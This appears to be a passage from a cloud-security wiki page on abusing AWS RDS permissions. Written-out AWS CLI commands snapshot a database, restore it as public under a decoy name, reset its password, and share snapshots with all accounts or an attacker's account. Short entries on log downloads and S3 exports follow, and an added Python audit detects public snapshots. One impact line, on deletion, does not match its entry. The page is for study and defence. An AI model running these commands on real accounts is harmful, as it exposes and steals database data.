If the attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB and then restoring a publicly accessible DB from that snapshot.
```bash
aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
    --db-instance-identifier <db-id> \
    --db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier "new-db-not-malicious" \
    --db-snapshot-identifier <snapshotId> \
    --db-subnet-group-name <dbsubnetgroup> \
    --publicly-accessible \
    --vpc-security-group-ids <ec2-securitygroup>

aws rds modify-db-instance \
    --db-instance-identifier "new-db-not-malicious" \
    --master-user-password 'Llaody2f6.123' \
    --apply-immediately

# Connect to the new DB after a few mins
```
An attacker with these permissions could create a snapshot of a DB and make it publicly available. Then, he could just create a DB from that snapshot in his own account.
If the attacker doesn't have rds:CreateDBSnapshot, he could still make other, already created snapshots public.
```bash
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
```
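A defender-side audit for the two exposures described above: a snapshot whose `restore` attribute is shared with `all` or with an unexpected account, and an instance that is publicly accessible. This is an added example, not part of the original page; it reads dicts shaped like the JSON output of `aws rds describe-db-snapshot-attributes` and `aws rds describe-db-instances`, and `TRUSTED_ACCOUNTS`, the function names and the sample data are assumptions constructed for illustration.

```python
# Added example: audit RDS for public/shared snapshots and public instances.
# Input dicts mirror the JSON returned by
#   aws rds describe-db-snapshot-attributes  and  aws rds describe-db-instances
# All identifiers and account IDs below are constructed sample values.

TRUSTED_ACCOUNTS = {"111122223333"}  # assumption: accounts you intentionally share with


def audit_snapshot_sharing(attr_results, trusted=TRUSTED_ACCOUNTS):
    """Flag snapshots whose 'restore' attribute lists 'all' or an untrusted account."""
    findings = []
    for res in attr_results:
        snap = res["DBSnapshotAttributesResult"]
        for attr in snap.get("DBSnapshotAttributes", []):
            if attr.get("AttributeName") != "restore":
                continue
            values = attr.get("AttributeValues", [])
            if "all" in values:  # anyone can restore this snapshot
                findings.append((snap["DBSnapshotIdentifier"], "PUBLIC", ["all"]))
                continue
            unknown = sorted(v for v in values if v not in trusted)
            if unknown:
                findings.append((snap["DBSnapshotIdentifier"], "EXTERNAL_SHARE", unknown))
    return findings


def audit_public_instances(describe_output, approved=frozenset()):
    """Return instances with PubliclyAccessible=true that are not explicitly approved."""
    return sorted(
        db["DBInstanceIdentifier"]
        for db in describe_output.get("DBInstances", [])
        if db.get("PubliclyAccessible") and db["DBInstanceIdentifier"] not in approved
    )


# Constructed sample data
SAMPLE_ATTRS = [
    {"DBSnapshotAttributesResult": {"DBSnapshotIdentifier": "nightly-backup",
        "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": []}]}},
    {"DBSnapshotAttributesResult": {"DBSnapshotIdentifier": "cloudgoat",
        "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": ["all"]}]}},
    {"DBSnapshotAttributesResult": {"DBSnapshotIdentifier": "partner-copy",
        "DBSnapshotAttributes": [{"AttributeName": "restore",
                                  "AttributeValues": ["111122223333", "444455556666"]}]}},
]
SAMPLE_INSTANCES = {"DBInstances": [
    {"DBInstanceIdentifier": "prod-db", "PubliclyAccessible": False},
    {"DBInstanceIdentifier": "new-db-not-malicious", "PubliclyAccessible": True},
]}
```

Run on a schedule against every snapshot and instance in each region, any finding that does not match a known sharing arrangement is worth tracing back to the principal that made the change.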
rds:DownloadDBLogFilePortion
An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
Potential impact: Deletion of existing RDS instances, and potential loss of data.
rds:StartExportTask
TODO: Test
An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.